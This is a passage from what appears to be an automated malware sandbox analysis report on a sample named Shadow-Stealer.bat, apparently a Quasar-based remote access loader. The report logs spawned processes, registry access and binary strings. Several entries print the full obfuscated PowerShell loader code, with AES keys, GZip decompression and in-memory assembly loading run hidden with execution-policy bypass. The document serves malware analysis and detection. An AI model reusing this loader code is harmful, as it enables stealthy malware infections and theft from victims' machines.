'')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] 
-join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8c0db931-f9fd-42d4-a5c0-43590a2016f6}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{c14234ed-73ac-4d78-a200-79518435a2b0}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYB
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{cbe0811f-76a5-44cc-bdc5-f8341ab968a9}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{e8c47de4-1fa8-45ae-ba48-1e652857c9f1}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{38d5fde3-99ae-4373-8c2f-8b4f5f08f7f3}
            Source: C:\Windows\System32\winlogon.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{92e841ec-e3f1-4b8b-895f-b885255cbce1}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{25768c7a-7ac5-4718-a464-d7bd931650f7}
            Source: C:\Windows\System32\winlogon.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2e416721-4f03-488b-85bf-d48d4305e55d}
            Source: C:\Windows\System32\winlogon.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{6cf183fd-4345-4e83-86c3-b67edbc5a93f}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{b21552e6-10c0-4b77-8348-e34fa993b74e}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{408c66d6-6f69-434f-838a-86e87b4371ae}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{205dcea9-d057-463c-a3cf-998f0b1939dc}
            Source: C:\Windows\System32\winlogon.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a65f9779-a778-403b-96e3-bdb0de023251}
            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\Shadow-Stealer.bat.exe "Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2ca74e05-00fd-4f33-afb0-1baa728859ba}
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{a795ed5e-f9f8-4b9c-9e39-bf732c676d16}
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3885b722-1a15-44b5-b09d-ff91e5413f87}
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{99a849d9-b898-48bd-a9ae-8d2739f763c9}
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Process created: unknown unknown
            Source: C:\Windows\$sxr-mshta.exe Process created: C:\Windows\$sxr-cmd.exe "C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%
            Source: C:\Windows\$sxr-cmd.exe Process created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8c0db931-f9fd-42d4-a5c0-43590a2016f6}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{c14234ed-73ac-4d78-a200-79518435a2b0}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYB
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{cbe0811f-76a5-44cc-bdc5-f8341ab968a9}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{e8c47de4-1fa8-45ae-ba48-1e652857c9f1}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{38d5fde3-99ae-4373-8c2f-8b4f5f08f7f3}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{92e841ec-e3f1-4b8b-895f-b885255cbce1}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{25768c7a-7ac5-4718-a464-d7bd931650f7}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2e416721-4f03-488b-85bf-d48d4305e55d}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{6cf183fd-4345-4e83-86c3-b67edbc5a93f}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{b21552e6-10c0-4b77-8348-e34fa993b74e}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{408c66d6-6f69-434f-838a-86e87b4371ae}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{205dcea9-d057-463c-a3cf-998f0b1939dc}
            Source: C:\Windows\$sxr-powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a65f9779-a778-403b-96e3-bdb0de023251}
            Source: C:\Windows\$sxr-powershell.exe Process created: unknown unknown
            Source: C:\Windows\$sxr-powershell.exe Process created: unknown unknown
            Source: C:\Windows\$sxr-powershell.exe Process created: unknown unknown
            Source: C:\Windows\$sxr-powershell.exe Process created: unknown unknown
            Source: C:\Windows\$sxr-powershell.exe Process created: unknown unknown
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Windows\System32\dllhost.exe Code function: 8_2_0000000140001014 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification,RegOpenKeyExW,RegDeleteValueW,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,8_2_0000000140001014
            Source: C:\Windows\SysWOW64\dllhost.exe Code function: 9_2_0040133E GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,9_2_0040133E
            Source: C:\Windows\System32\dllhost.exe Code function: 20_2_0000000140001B30 LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification,FindResourceA,RegCreateKeyExW,RegSetKeySecurity,RegCreateKeyExW,RegSetValueExW,RegCloseKey,CreateThread,CreateThread,SleepEx,20_2_0000000140001B30
            Source: C:\Windows\SysWOW64\dllhost.exe Code function: 23_2_00401B33 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,23_2_00401B33
            Source: C:\Windows\$sxr-powershell.exe WMI Queries: IWbemServices::ExecNotificationQuery - root\cimv2 : select * from Win32_ProcessStartTrace
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jlgsfutp.pce.ps1
            Source: C:\Windows\System32\dllhost.exe Code function: 8_2_0000000140001014 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification,RegOpenKeyExW,RegDeleteValueW,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,8_2_0000000140001014
            Source: C:\Windows\$sxr-cmd.exe Code function: 13_2_00007FF71380FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,13_2_00007FF71380FB54
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
            Source: C:\Windows\$sxr-powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
            Source: C:\Windows\$sxr-powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
            Source: C:\Windows\$sxr-powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2244:120:WilError_03
            Source: C:\Windows\$sxr-powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\cf16a257-7d89-4296-8384-8fca3dbb568f
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4072:120:WilError_03
            Source: C:\Windows\$sxr-mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Shadow-Stealer.bat Static file information: File size 13144733 > 1048576
            Source: Binary string: <Module>costura.metadatacostura.sharpdx.direct3d11.pdb.compressedcostura.costura.pdb.compressedcostura.sharpdx.dxgi.pdb.compressedcostura.sharpdx.pdb.compressedcostura.sharpdx.direct3d11.dll.compressedcostura.costura.dll.compressedcostura.sharpdx.dxgi.dll.compressedcostura.gma.system.mousekeyhook.dll.compressedcostura.system.runtime.interopservices.runtimeinformation.dll.compressedcostura.quasar.common.dll.compressedcostura.newtonsoft.json.dll.compressedcostura.bouncycastle.crypto.dll.compressedcostura.ionic.zip.dll.compressedcostura.microsoft.win32.taskscheduler.dll.compressedcostura.de.microsoft.win32.taskscheduler.resources.dll.compressedcostura.pl.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-cn.microsoft.win32.taskscheduler.resources.dll.compressedcostura.fr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.es.microsoft.win32.taskscheduler.resources.dll.compressedcostura.it.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-hant.microsoft.win32.taskscheduler.resources.dll.compressedcostura.ru.microsoft.win32.taskscheduler.resources.dll.compressedcostura.protobuf-net.dll.compressedcostura.sharpdx.dll.compressed4a731784-801d-481b-a36f-654a2936777eQuasar.Client.InstallStager.exeQuasar.Client.UninstallStager.exeQuasar.Client.ResetPatcher.binQuasar.Client.QuasarApplication.resourcesQuasar.Client.Properties.Resources.resourcesILRepack.List source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
